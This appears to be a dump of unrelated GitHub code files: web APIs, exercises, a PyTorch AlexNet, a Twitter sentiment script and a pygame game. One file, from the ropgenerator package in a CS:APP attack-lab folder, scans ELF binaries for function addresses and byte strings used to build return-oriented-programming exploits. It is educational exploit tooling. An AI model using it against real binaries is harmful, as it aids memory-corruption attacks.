organization_setup_data_list):\n result.append_issue(\n 'Did not find any employee organization setup to handle'\n )\n else:\n has_invalid = False\n validation_results = []\n\n for data in organization_setup_data_list:\n validate_result = self.validate_employee_organization_setup_data(data)\n if (validate_result.has_issue()):\n has_invalid = True \n\n 
validation_results.append(validate_result)\n\n if (has_invalid):\n result.append_issue(\n 'There are validation issues on some employee organization setup data.'\n )\n\n result.set_output_data(validation_results)\n\n return result\n\n def validate_employee_organization_setup_data(self, organization_setup_data):\n result = OperationResult(organization_setup_data)\n result.set_output_data(organization_setup_data)\n\n if (not organization_setup_data or\n not organization_setup_data.company_id):\n result.append_issue(\n \"Missing necessary information for employee organization setup\"\n )\n return result\n\n if (not organization_setup_data.employee_person_id):\n result.append_issue(\n \"Could not locate employee profile for the given employee\"\n )\n\n # It is a valid case where manager info is not specified, which \n # we infer as to not-setup or remove manager for the employee\n # But it is invalid that the manager info is specified but failed\n # to resolve to a valid employee profile\n if (organization_setup_data.has_manager_info_specified \n and not organization_setup_data.manager_profile_id):\n result.append_issue(\n \"Could not locate manager's employee profile based on info provided\"\n )\n\n # check the employee and manager belong to the same company\n employee_profile = organization_setup_data.get_employee_profile()\n manager_profile = organization_setup_data.get_manager_profile()\n if (employee_profile and manager_profile):\n if (employee_profile.company.id != manager_profile.company.id):\n result.append_issue(\n \"The employee and manager specified do not work in the same company\"\n )\n\n return result\n","repo_name":"smoothbenefits/BenefitMY_Python","sub_path":"app/service/employee_organization_service.py","file_name":"employee_organization_service.py","file_ext":"py","file_size_in_byte":7917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30873330521","text":"#!/usr/bin/env python3\nimport sys\nimport os\nimport time\nimport mido\nimport struct\nimport array\n\nEnvelope = struct.Struct(\"iidixxxx\")\n\ndef make_instrument(channel: int, amps: \"List[float]\") -> bytes:\n\treturn b\"\\xF0\" + \\\n\t\tstruct.pack(\"B\", ((len(amps) << 4) | (channel & 15))) + \\\n\t\tarray.array(\"d\", amps).tobytes() + \\\n\t\tb\"\\xF1\" + \\\n\t\tstruct.pack(\"B\", channel & 15) + \\\n\t\tEnvelope.pack(4410, 44100, 0.3, 10000)\n\n\ndef playnote(note, amp):\n\tif amp != 0:\n\t\tsys.stdout.buffer.write(bytes([0, note, amp]))\n\telse:\n\t\tsys.stdout.buffer.write(bytes([1, note]))\n\tsys.stdout.buffer.flush()\n\nif sys.argv[1] == \"--loop\":\n\tloop = True\n\tfile = mido.MidiFile(sys.argv[2])\nelse:\n\tloop = False\n\tfile = mido.MidiFile(sys.argv[1])\nsys.stderr.write(\"%.2f seconds\\n\" % file.length)\nplay = file.play()\nwhile True:\n\ttry:\n\t\tfor msg in play if not loop else file.play():\n\t\t\t#sys.stderr.write(str(msg.bytes()))\n\t\t\tif msg.type in ('note_on', 'note_off', 'pitchwheel'):\n\t\t\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n\t\t\telif msg.type == 'program_change':\n\t\t\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n#\t\t\t\tif msg.program > 1:\n#\t\t\t\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n#\t\t\t\telse:\n#\t\t\t\t\tamps = [1.0, 0, 1/4, 0, 1/9, 0, 1/16, 0, 1/49]\n#\t\t\t\t\tsys.stdout.buffer.write(make_instrument(msg.channel, amps))\n\t\t\tsys.stdout.buffer.flush()\n\t\tbreak\n\texcept 
KeyboardInterrupt:\n\t\t#sys.stdout.close()\n\t\t#https://docs.python.org/3/faq/library.html#why-doesn-t-closing-sys-stdout-stdin-stderr-really-close-it\n\t\texit()\nexit()\n\"\"\"\nfor msg in mido.MidiFile(sys.argv[1]).play():\n\t#sys.stderr.write(str(msg.bytes()))\n\tif msg.type == 'note_on' and msg.velocity > 0:\n\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n\telif msg.type == 'note_off':\n\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n\telif msg.type == 'note_on' and msg.velocity == 0:\n\t\tsys.stdout.buffer.write(bytes([0x80+msg.channel, msg.note, 0]))\n\telif msg.type == 'program_change':\n\t\tsys.stdout.buffer.write(bytes(msg.bytes()))\n\tsys.stdout.buffer.flush()\n\"\"\"\n","repo_name":"zachs18/midi-player","sub_path":"midi.py","file_name":"midi.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2363354692","text":"size = int(input())\nfarm = []\ncolheita = 0\nfor _ in range(size):\n farm.append(list(map(int, input().split())))\n\noperations = int(input())\nfor _ in range(operations):\n primeira_linha, primeira_coluna, linha_final, coluna_final = map(int, input().split())\n for linha in range(primeira_linha-1, linha_final):\n for coluna in range(primeira_coluna-1, coluna_final):\n colheita += farm[linha][coluna]\n farm[linha][coluna] = 0\n\nprint(colheita)\n","repo_name":"DyogoBendo/exercicios-maratona-programacao","sub_path":"davi/Array, Matrizes e Funções/manolo_neps.py","file_name":"manolo_neps.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32459467430","text":"from src import pagedimensions as pd\nimport tinycss\nimport os\n\nclass Styler:\n def __init__(self):\n self.pageDim = {\n # Sizes ordered as WxH in cm\n 'a0': pd.PageDimensions(84.1, 118.9),\n 'a1': pd.PageDimensions(59.4, 84.1),\n 'a2': pd.PageDimensions(42.0, 59.4),\n 'a3': pd.PageDimensions(29.7, 42.0),\n 'a4': pd.PageDimensions(21.0, 29.7),\n 'a5': pd.PageDimensions(14.8, 21.0),\n 'a6': pd.PageDimensions(10.5, 14.8),\n 'b0': pd.PageDimensions(100.0, 141.4),\n 'b1': pd.PageDimensions(59.4, 84.1),\n 'b2': pd.PageDimensions(42.0, 59.4),\n 'b3': pd.PageDimensions(29.7, 42.0),\n 'b4': pd.PageDimensions(21.0, 29.7),\n 'b5': pd.PageDimensions(14.8, 21.0),\n 'b6': pd.PageDimensions(10.5, 14.8),\n 'elevenseventeen': pd.PageDimensions(27.94, 43.1),\n 'legal': pd.PageDimensions(21.59, 35.56),\n 'letter': pd.PageDimensions(21.59, 27.94)\n }\n self.theme = 'simple'\n self.margin = 'normal'\n self.top = 2.0\n self.left = 2.0\n self.pagesize = 'letter'\n self.orientation = 'portrait' # One of ['portrait', 'landscape']\n self.pgnum = False\n self.title = 'New Document'\n self.template = ''\n self.width\n self.height\n\n\n @property\n def theme(self):\n return self._theme\n \n @theme.setter\n def theme(self, theme_fn):\n \"\"\" Sets a new theme for the document \"\"\"\n # Check if the file passed in exists\n filename = \"themes/\" + theme_fn + '/' + theme_fn + \".css\"\n if (os.path.exists(filename) == False):\n print(\"[PARSER_ERR] Could not find theme file '{}'. Please make sure that the theme is in the theme/ folder. 
Falling back on default theme.\".format(filename))\n return\n\n # Open and read the new themesheet from the themes/ folder\n f = open(filename, \"r\")\n new_theme = f.read()\n f.close()\n\n # Validate the CSS for the document and set the CSS if it is valid\n verifier = tinycss.make_parser('page3')\n parsed_contents = verifier.parse_stylesheet(new_theme)\n self._theme = new_theme \n\n @property\n def margin(self):\n return self._margin\n\n @margin.setter\n def margin(self, new_margin):\n \"\"\" Sets a new margin \"\"\"\n self._margin = new_margin\n\n @property\n def top(self):\n return self._top\n\n @top.setter\n def top(self, new_TB):\n \"\"\" Sets new top value \"\"\"\n self._top = new_TB\n\n @property\n def left(self):\n return self._left\n\n @left.setter\n def left(self, new_LR):\n \"\"\" Sets new left value \"\"\"\n self._left = new_LR\n\n @property\n def pagesize(self):\n return self._pagesize\n\n @pagesize.setter\n def pagesize(self, new_pagesize):\n \"\"\" Sets a new pagesize \"\"\"\n self._pagesize = new_pagesize\n self._height = 1\n self._width = 1\n\n @property\n def orientation(self):\n return self._orientation\n\n @orientation.setter\n def orientation(self, new_orientation):\n \"\"\" Sets a new orientation for the document \"\"\"\n self._orientation = new_orientation\n\n @property\n def pgnum(self):\n return self._pgnum\n \n @pgnum.setter\n def pgnum(self, onOrOff: bool):\n \"\"\" Turns the page numbers on or off \"\"\"\n self._pgnum = onOrOff\n\n @property\n def title(self):\n return self._title\n\n @title.setter\n def title(self, new_title):\n \"\"\" Sets the title of the document \"\"\"\n self._title = new_title\n\n @property\n def template(self):\n return self._template\n\n @template.setter\n def template(self, new_template):\n \"\"\" Sets the preprocessor command template of the document \"\"\"\n self._template = new_template\n\n @property\n def width(self):\n return self._width\n\n @width.setter\n def width(self, a):\n \"\"\" Sets the width of the document based on orientation \"\"\"\n if self._orientation == 'portrait':\n page_width = (self.pageDim[self._pagesize]).width\n self._width = page_width - (2 * self._left)\n if self._orientation == 'landscape':\n page_height = (self.pageDim[self._pagesize]).height\n self._width = page_height - (2 * self._top)\n\n \n @property\n def height(self):\n return self._height\n \n @height.setter\n def height(self, a):\n \"\"\" Sets the height of the document based on orientation \"\"\"\n if self._orientation == 'portrait':\n page_height = (self.pageDim[self._pagesize]).height\n self._height = page_height - (2 * self._top)\n if self._orientation == 'landscape':\n page_width = (self.pageDim[self._pagesize]).width\n self._height = page_width - (2 * self._left)\n\n \n\n","repo_name":"rafaelwi/rnote","sub_path":"src/styling.py","file_name":"styling.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30077924358","text":"\"\"\"\nThis module implements response for department requests\n\"\"\"\nfrom flask import request\nfrom marshmallow import ValidationError\nimport src.service.database_queries as service\nfrom flask_restful import Resource\nfrom src import db\nfrom src.rest.resources.wrappers import check_authorisation\nfrom src.schemas.department import DepartmentSchema\n\n\nclass DepartmentApi(Resource):\n \"\"\"\n Class for department restfull resource\n \"\"\"\n department_schema = DepartmentSchema()\n\n @check_authorisation\n def 
get(self, uuid=None):\n \"\"\"\n get method for department request\n :param uuid: optional parameter uses for getting department by uuid\n :return: departments data in json\n \"\"\"\n if uuid is None:\n departments = service.get_all_departments()\n return self.department_schema.dump(departments, many=True), 200\n department = service.get_department_by_uuid(uuid)\n if not department:\n return \"\", 404\n return self.department_schema.dump(department), 200\n\n @check_authorisation\n def post(self):\n \"\"\"\n post method for department request\n :return: created department data in json\n \"\"\"\n try:\n department = self.department_schema.load(request.json, session=db.session)\n except ValidationError as err:\n return {\"message\": str(err)}, 400\n service.add_department(department)\n return self.department_schema.dump(department), 201\n\n @check_authorisation\n def put(self, uuid):\n \"\"\"\n put method for department request\n :param uuid: uuid of department you want to change\n :return: changed department data in json\n \"\"\"\n department = service.get_department_by_uuid(uuid)\n if not department:\n return \"\", 404\n try:\n department = self.department_schema.load(request.json, session=db.session)\n except ValidationError as err:\n return {\"message\": str(err)}, 400\n service.update_department(department, uuid)\n return self.department_schema.dump(department), 200\n\n @check_authorisation\n def patch(self, uuid):\n \"\"\"\n put method for department request\n :param uuid: uuid of department you want to change\n :return: changed department data in json\n \"\"\"\n department = service.get_department_by_uuid(uuid)\n if not department:\n return \"\", 404\n update_json = request.json\n if not update_json:\n return {\"message\": \"nothing to update\"}, 400\n service.alter_department(department, update_json)\n return self.department_schema.dump(department), 200\n\n @check_authorisation\n def delete(self, uuid):\n \"\"\"\n delete method for department request\n :param uuid: uuid of department you want to delete\n :return: request response\n \"\"\"\n department = service.get_department_by_uuid(uuid)\n if not department:\n return \"\", 404\n service.delete_department(department)\n return {\"message\": \"deleted successfully\"}, 204\n","repo_name":"akopika/epam_project","sub_path":"src/rest/resources/department.py","file_name":"department.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73638629283","text":"def dropStones(grid):\n rowLen = len(grid) - 1\n colLen = len(grid[0])\n for col in range(colLen):\n down = rowLen\n for top in range(rowLen, -1, -1):\n print(grid[top][col], end=\"\")\n if grid[top][col] == \"o\":\n down = top - 1\n elif grid[top][col] == \"*\":\n grid[down][col], grid[top][col] = grid[top][col], grid[down][col]\n down -= 1\n print()\n\n for i in range(rowLen + 1):\n print(\"\".join(grid[i]))\n\n\ntestcases = int(input())\ngrids = [[] for i in range(testcases)]\nfor i in range(testcases):\n dimesion = list(map(int, input().split()))\n for _ in range(dimesion[0]):\n grids[i].append(list(input()))\nfor grid in grids:\n dropStones(grid)\n","repo_name":"Haymanot-Demis/A2SV-Problems","sub_path":"Codeforces/E.Drop the Stones.py","file_name":"E.Drop the Stones.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73863946402","text":"# -*- coding:utf-8 -*- \n# Scanner module: 
Scan binaries to get useful infos for exploits \n\nimport subprocess\nimport mmap\nimport re\nfrom ropgenerator.Gadget import Gadget\nimport ropgenerator.Architecture as Arch\n\n# Test elftools \nfrom elftools.elf.elffile import ELFFile\nfrom elftools.elf.relocation import RelocationSection\nfrom elftools.elf.sections import SymbolTableSection, NullSection\n\nbinary_name = None\nbinary_ELF = None\n\ndef initScanner(filename):\n global binary_name\n global binary_ELF\n \n binary_name = filename\n f = open(binary_name, 'rb')\n \n if( Arch.currentIsELF()):\n binary_ELF = ELFFile(f)\n else:\n binary_ELF = None\n\n##################\n# Manage offsets #\n##################\n_offset = 0\ndef set_offset(offset):\n global _offset\n _offset = offset\n return True\n \ndef reset_offset():\n global _offset\n _offset=0\n \n\ndef getAllFunctions():\n \"\"\"\n Return a list of all functions for relocation entries\n \"\"\"\n global _offset \n # Get functions from relocations \n relasec_name = '.rela.plt'\n relasec = binary_ELF.get_section_by_name(relasec_name)\n if not isinstance(relasec, RelocationSection):\n return []\n else:\n relasec_addr = relasec.header['sh_addr']\n symbols = binary_ELF.get_section(relasec.header['sh_link'])\n if( not isinstance(symbols, NullSection)): \n return [(symbols.get_symbol(reloc['r_info_sym']).name, reloc['r_offset']+relasec_addr + _offset) for reloc in relasec.iter_relocations() if reloc.is_RELA()]\n return []\n\ndef getSectionAddress(name):\n \"\"\"\n Returns the address of a segment in the loaded binary \n \"\"\" \n global binary_ELF, _offset\n section = binary_ELF.get_section_by_name(name)\n if( not section ):\n return None\n return section.header[\"sh_addr\"] + _offset\n \ndef getSymbolSections():\n global binary_ELF\n\n if( not Arch.currentIsELF ):\n return []\n return [section for section in binary_ELF.iter_sections() if( isinstance(section, SymbolTableSection))]\n \ndef getFunctionAddress(name):\n \"\"\"\n Looks for the function 'name' in the PLT of a binary \n Returns a pair (name, address) as (str, int)\n \"\"\"\n global binary_name\n global binary_ELF, _offset\n \n if( not Arch.currentIsELF()):\n return (None, None)\n \n # Get function in relocatins\n relasec_name = '.rela.plt'\n relasec = binary_ELF.get_section_by_name(relasec_name)\n if not isinstance(relasec, RelocationSection):\n return (None,None)\n relasec_addr = relasec.header['sh_addr']\n symbols = binary_ELF.get_section(relasec.header['sh_link'])\n if( not isinstance(symbols, NullSection)): \n for reloc in relasec.iter_relocations():\n if (symbols.get_symbol(reloc['r_info_sym']).name == name ):\n return (name, reloc['r_offset']+relasec_addr + _offset)\n \n # Get function from symbol table sections \n for symsec in getSymbolSections():\n function = symsec.get_symbol_by_name(name)\n if( function ):\n return (name, function[0]['st_value'] + _offset) \n return (None, None)\n\ndef findBytes(byte_string, badBytes = [], add_null=False ):\n \"\"\"\n Parameters\n ----------\n badbytes : bad bytes for substrings addresses\n add_null : if True then add terminaison null bytes in the end of the substrings \n \n Example: \n byte_string = 'abc' then result is the address of a string 'abc\\x00'\n or a list of addresses s.t elements form 'abc' like 'ab\\x00' 'c\\x00' \n \"\"\"\n \n def _find_substr(m,string):\n if( not string ):\n return [-1,0]\n # Initialize\n offset = -1\n index = len(string)\n substring = string\n # Search biggest substring \n while( offset == -1 ):\n if( len(substring) <= 0 ):\n return [-1,0]\n 
offset = m.find(substring)\n if( offset != -1 ):\n return [offset, index]\n else:\n substring = substring[:-1]\n index = index -1\n \n def _find_substr_add_null(m, string):\n if( not string ):\n return [-1,0]\n # Initialize\n offset = -1\n index = len(string)\n last_is_null = (string[-1] == '\\x00')\n if( not last_is_null ):\n substring = string + '\\x00'\n else:\n substring = string\n # Search biggest substring \n while( offset == -1 ):\n if( len(substring) <= 0 ):\n return [-1,0]\n offset = m.find(substring)\n if( offset != -1 ):\n return [offset, index]\n else:\n substring = substring[:-2]\n if( not substring ):\n return [-1,0]\n last_is_null = (substring[-1] == '\\x00') \n if( not last_is_null ):\n substring = substring + '\\x00'\n index = index -1\n \n def _verify_bad_bytes(addr, badBytes):\n addrBytes = re.findall('..',('{:'+'{:02d}'\\\n .format(Arch.currentArch.octets)+'x}').format(addr))\n for byte in badBytes:\n if( byte in addrBytes):\n return False\n return True\n \n # Function body \n global binary_name\n global binary_ELF, _offset\n \n section_names = [\".text\", '.data']\n # Getting data from all sections\n sections = []\n for section_name in section_names:\n section = binary_ELF.get_section_by_name(section_name)\n if( section.is_null() ):\n continue\n m = section.data()\n addr = section.header['sh_addr']\n sections.append((m, addr))\n if( not sections ):\n return []\n \n # Getting bytes as substrings \n res = []\n substring = str(byte_string)\n while( substring ):\n found = False\n section_num = 0\n (m, section_addr) = sections[section_num]\n start = 0\n end = len(m)-1\n ## \n m_tmp = str(m)\n section_changed = False\n while( not found ):\n if( not m_tmp ):\n section_changed = True\n section_num += 1\n \n if( section_num >= len(sections)):\n # Coudln't find substring in any sections \n return []\n \n if( section_changed ):\n (m, section_addr) = sections[section_num]\n start = 0\n end = len(m)-1\n m_tmp = str(m)\n \n # Get substring address \n if( add_null ):\n (offset, index ) = _find_substr_add_null(m_tmp, substring)\n else:\n (offset, index ) = _find_substr(m_tmp, substring)\n # We didn't find any match, try next section \n if( index == 0 ):\n section_num += 1\n section_changed = True\n else:\n section_changed = False\n # Check for bad bytes in the address \n if( not section_changed ):\n if( _verify_bad_bytes(start+offset, badBytes)):\n found = True\n else:\n m_tmp = m_tmp[offset:]\n \n # We add the best substring we found\n if( add_null and substring[:index] != '\\x00'):\n res.append([offset+section_addr+_offset,substring[:index]+\"\\x00\"])\n else:\n res.append([offset+section_addr+_offset,substring[:index]])\n substring = substring[index:]\n section_num = 0\n \n return res\n","repo_name":"xubenji/csapp","sub_path":"attacklab03/target1/venv/lib/python2.7/site-packages/ropgenerator-1.2-py2.7.egg/ropgenerator/exploit/Scanner.py","file_name":"Scanner.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28901420638","text":"from django.shortcuts import render\nfrom django.http.response import HttpResponseRedirect\n\n# Create your views here.\ndef main(request):\n return render(request, 'main.html')\n\ndef setos(request):\n if \"favorite_os\" in request.GET:\n print(request.GET[\"favorite_os\"])\n request.session['f_os'] = request.GET[\"favorite_os\"] # session 생성함\n \n return HttpResponseRedirect('/showos') # showos 요청이 발생\n else:\n return render(request, 'setos.html')\n \n 
# Render는 forwarding\n # HttpResponseRedirect는 redirect\n \ndef showos(request):\n context ={} #dict\n \n if 'f_os' in request.session: # 세션 키 중에서 'f_os'가 있다면\n context['f_os'] = request.session['f_os'] # request.session.get('f_os')\n context['message'] = \"그대가 선택한 운영체제는 %s\" % request.session['f_os']\n \n else:\n context['f_os'] = None\n context['message'] = \"ㅠㅠ 운영체제를 선택하지 못했네요\"\n \n request.session.set_expiry(5) # 5초간 유효\n return render(request, 'show.html', context)\n ","repo_name":"bnb1212/Portfolio","sub_path":"PythonProject/django_test3/sessionapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22680731013","text":"\"\"\"\nAlexNet Architecture\n\nInput Width, Height, channel = 227 x 227 x3\n Conv1:\n Filter = 11x11 \n Stride = 4\n Activate = ReLU\n MaxPooling => Filter = 3x3, Stride = 2\n \n Conv2:\n Filter = 5x5\n Stride = 1\n Padding = 2\n Activate = ReLU\n MaxPooling => Filter = 3x3, Stride = 2\n \n Conv3:\n Filter = 3x3\n Strider = 1\n Padding = 1\n Activate ReLU\n \n Conv4:\n Filter = 3x3\n Strider = 1\n Padding = 1\n Activate ReLU\n \n Conv5:\n Filter = 3x3\n Strider = 1\n Padding = 1\n Activate ReLU\n MaxPooling => Filter 3x3, Stride = 2\n \n Dropout:\n rate = 0.5\n\n\"\"\"\n\nimport torch\nimport torch.nn as nn\n\nclass AlexNet(nn.Module):\n def __init__(self, num_classes=1000):\n super(AlexNet, self).__init__()\n \n self.layers = nn.Sequential(\n \n nn.Conv2d(in_channels=3, out_channels=96, kernel_size=11, stride=4, padding=0),\n #Calcultation Layer => (3, 227, 227) -> (??, (227 + 0 - 11) / 4 + 1, (227 + 0 - 11) / 4 + 1)\n #Calcultation Layer => (3, 227, 227) -> (??, (216) / 4 + 1, (216) / 4 + 1)\n #Calcultation Layer => (3, 227, 227) -> (96, 54 + 1, 54 + 1)\n #Output_size = (96, 55, 55)\n nn.ReLU(),\n #Output_size = (96, 55, 55)\n nn.MaxPool2d(kernel_size=3, stride=2),\n #Calculation Layer => (96, 55, 55) -> (96, 27, 27)\n #Output_size = (96, 27, 27)\n nn.Conv2d(in_channels=96,out_channels=256,kernel_size=5, stride=1, padding=2),\n #Calculation Layer => (96, 27, 27) -> (256, (27 + 2 * 2 - 5) / 1 + 1, (27 + 2 * 2 - 5) / 1 + 1)\n #Calculation Layer => (96, 27, 27) -> (256, (26) / 1 + 1, (26) / 1 + 1)\n #Calculation Layer => (96, 27, 27) -> (256, 27, 27)\n #Output_size = (256, 27, 27)\n nn.ReLU(),\n #Output_size = (256, 27, 27)\n nn.MaxPool2d(kernel_size=3, stride=2),\n #Calculation Layer => (256, 27, 27) -> (256, 27 / 2, 27 / 2)\n #Calculation Layer => (256, 27, 27) -> (256, 13.xx, 13.xx)\n #Output_size = (256, 13, 13)\n nn.Conv2d(in_channels=256, out_channels=384, kernel_size=3, stride=1, padding=1),\n #Calculation Layer => (256, 13, 13) -> (384, (13 + 2 * 1 - 3) / 1 + 1, (13 + 2 * 1 - 3) / 1 + 1)\n #Calculation Layer => (256, 13, 13) -> (384, (12) / 1 + 1, (12) / 1 + 1)\n #Calculation Layer => (256, 13, 13) -> (384, 13, 13)\n #Output_size = (384, 13, 13)\n nn.ReLU(),\n #Output_size = (384, 13, 13)\n nn.Conv2d(in_channels=384, out_channels=384, kernel_size=3, stride=1, padding=1),\n #Calculation Layer => (384, 13, 13) -> (384, (13 + 2 * 1 - 3) / 1 + 1, (13 + 2 * 1 - 3) / 1 + 1)\n #Calculation Layer => (384, 13, 13) -> (384, (12) / 1 + 1, (12) / 1 + 1)\n #Calculation Layer => (384, 13, 13) -> (384, 13, 13)\n #Output_size = (384, 13, 13)\n nn.ReLU(),\n #Output_size = (384, 13, 13)\n nn.Conv2d(in_channels=384, out_channels=256, kernel_size=3, stride=1, padding=1),\n #Calculation Layer => (384, 13, 13) -> (256, (13 + 2 * 1 - 3) / 1 + 1, (13 + 
2 * 1 - 3) / 1 + 1)\n #Calculation Layer => (384, 13, 13) -> (256, (12) / 1 + 1, (12) / 1 + 1)\n #Calculation Layer => (384, 13, 13) -> (256, 13, 13)\n nn.ReLU(),\n #Output_size = (256, 13, 13)\n nn.MaxPool2d(kernel_size=3, stride=2),\n #Output_size = (256, 6, 6)\n \n )\n \n self.classifier = nn.Sequential(\n nn.Dropout(p=0.5),#생략 가능\n #Input_size = (256, 6, 6)\n nn.Linear(in_features=256*6*6,out_features=4096),\n nn.ReLU(inplace=True),\n nn.Linear(in_features=4096,out_features=4096),\n nn.ReLU(),\n nn.Linear(in_features=4096,out_features=num_classes) \n )\n\n def init_bias_weights(self):\n for layer in self.layers:\n if isinstance(layer, nn.Conv2d):\n nn.init.normal_(layer.weight, mean=0, std=0.01)\n nn.init.constant_(layer.bias, 0)\n nn.init.constant_(self.net[4].bias, 1)\n nn.init.constant_(self.net[10].bias, 1)\n nn.init.constant_(self.net[12].bias, 1)\n \n def forward(self, x):\n x = self.layers(x)\n x = x.view(-1, 256 * 6 * 6)\n x = self.classifier(x)\n return x \n","repo_name":"hsysfan/Pytorch-implementation","sub_path":"models/AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32488384867","text":"import tweepy\nimport json\nimport logging\nimport sys\nimport os\nimport re\nfrom nlp import getSenimentScoreForTopic\nfrom storageUtils import Storage\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\n_LOGGER = logging.getLogger(__name__)\n_LOGGER.setLevel(logging.DEBUG)\n\nconsoleHandler = logging.StreamHandler(sys.stdout)\nconsoleHandler.setLevel(logging.INFO)\n\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\nconsoleHandler.setFormatter(formatter)\n\n_LOGGER.addHandler(consoleHandler)\n\nCONSUMER_KEY = os.getenv(\"CONSUMER_KEY\")\nCONSUMER_SECRET = os.getenv(\"CONSUMER_SECRET\")\nACCESS_TOKEN = os.getenv(\"ACCESS_TOKEN\")\nACCESS_TOKEN_SECRET = os.getenv(\"ACCESS_TOKEN_SECRET\")\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n\n\n# _LOGGER.info('fdksjfksdlfj')\n\n\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n\nwith open('data/stateAbbrev.json', \"r\") as states:\n stateID = json.load(states)\n\n# index = 0\n# for state in stateID:\n# if index > 45:\n# geostates = api.geo_search(query=state, granularity=\"city\")\n# for geostate in geostates:\n# if geostate.name == stateID[state]:\n# print(geostate.name, geostate.id)\n# index += 1\n\nwith open('data/stateID.json', \"r\") as states:\n stateCodes = json.load(states)\n\ntopicsMap = json.load(open('data/topics.json', 'r'))\n\n\nemoticons_happy = set([\n ':-)', ':)', ';)', ':o)', ':]', ':3', ':c)', ':>', '=]', '8)', '=)', ':}',\n ':^)', ':-D', ':D', '8-D', '8D', 'x-D', 'xD', 'X-D', 'XD', '=-D', '=D',\n '=-3', '=3', ':-))', \":'-)\", \":')\", ':*', ':^*', '>:P', ':-P', ':P', 'X-P',\n 'x-p', 'xp', 'XP', ':-p', ':p', '=p', ':-b', ':b', '>:)', '>;)', '>:-)',\n '<3'\n ])\n\nemoticons_sad = set([\n ':L', ':-/', '>:/', ':S', '>:[', ':@', ':-(', ':[', ':-||', '=L', ':<',\n ':-[', ':-<', '=\\\\', '=/', '>:(', ':(', '>.<', \":'-(\", \":'(\", ':\\\\', ':-c',\n ':c', ':{', '>:\\\\', ';('\n ])\n\n\ndef preprocess(tweet):\n # remove urls and mentions\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n\n\n\nemotics = emoticons_happy.union(emoticons_sad)\n\n\ndef getTweetsForTopic(topic):\n \n tweetsByState = {}\n for 
state in stateCodes:\n tweetsByState[state] = []\n\n max_queries = 6\n for state in stateCodes:\n \n stateCode = stateCodes[state]\n tweets = tweet_batch = api.search(q=\"place:{} {} lang:en \".format(stateCode,\n topicsMap[topic]), result_type=\"mixed\", count=100)\n count = 1\n\n #strange twitter search behaviour\n #even though search doesn't exceed count there are more results on subsequent search\n while count < max_queries:\n tweet_batch = api.search(q=\"place:{} {} lang:en \".format(stateCode, topicsMap[topic]),\n result_type=\"mixed\",\n count=100,\n max_id=tweet_batch.max_id)\n tweets.extend(tweet_batch)\n count += 1\n \n for tweet in tweets:\n if len(tweet.text) > 10:\n tweetsByState[state].append(\n {\n 'text': preprocess(tweet.text),\n 'retweet_count': tweet.retweet_count,\n 'favourite_count': tweet.favorite_count\n })\n _LOGGER.info('state {} has loaded {} for topic: {}'.format(state, len(tweets), topicsMap[topic]))\n \n fileName = 'data/twitterData/tweetState_{}.txt'.format(topic)\n try: \n Storage.upload(json.dumps(tweetsByState, ensure_ascii=False, indent=4), fileName)\n _LOGGER.info('tweets for {} have been successfully loaded.'.format(topicsMap[topic]))\n except IOError:\n _LOGGER.error('unable to successfuly load files')\n\n return tweetsByState\n\n\ndef loadAllTweetsandGetScores():\n #loadAll Tweets\n\n topicvals = topicsMap.keys()\n\n if topicvals:\n for topic in topicvals:\n getTweetsForTopic(topic)\n getSenimentScoreForTopic(topic)\n else:\n raise ImportError\n\n \n\n","repo_name":"btree1970/CountrySentiment","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35256335753","text":"import pygame\nfrom settings import Settings\nfrom ship import Ship\nimport game_functions as gf\nfrom pygame.sprite import Group\nfrom game_stats import GameStats\nfrom button import Button\nfrom scoreboard import ScoreBoard\n\n\ndef run_game():\n '''Initialize game and create a screen object '''\n\n pygame.init()\n ai_setting = Settings()\n screen = pygame.display.set_mode((ai_setting.screen_width,ai_setting.screen_height))\n # screen object is called surface\n # surface is a part of screen where game element is displayed\n pygame.display.set_caption(\"Alien Invasion\")\n\n # Make Ship\n ship = Ship(screen, ai_setting)\n\n # make group to store bullet in\n bullets = Group()\n\n # Make a single alien\n # aliens = Alien(ai_setting, screen)\n \n # Group of alien \n aliens = Group()\n # create a fleet of an alien\n gf.create_fleet(ai_setting, screen, aliens, ship)\n\n # creating an instance to store game statistics and scoreboard\n stats = GameStats(ai_setting)\n sb = ScoreBoard(ai_setting, screen, stats)\n\n # Make play button\n play_button = Button(ai_setting, screen, \"Play\")\n # start the main loop for the game\n while 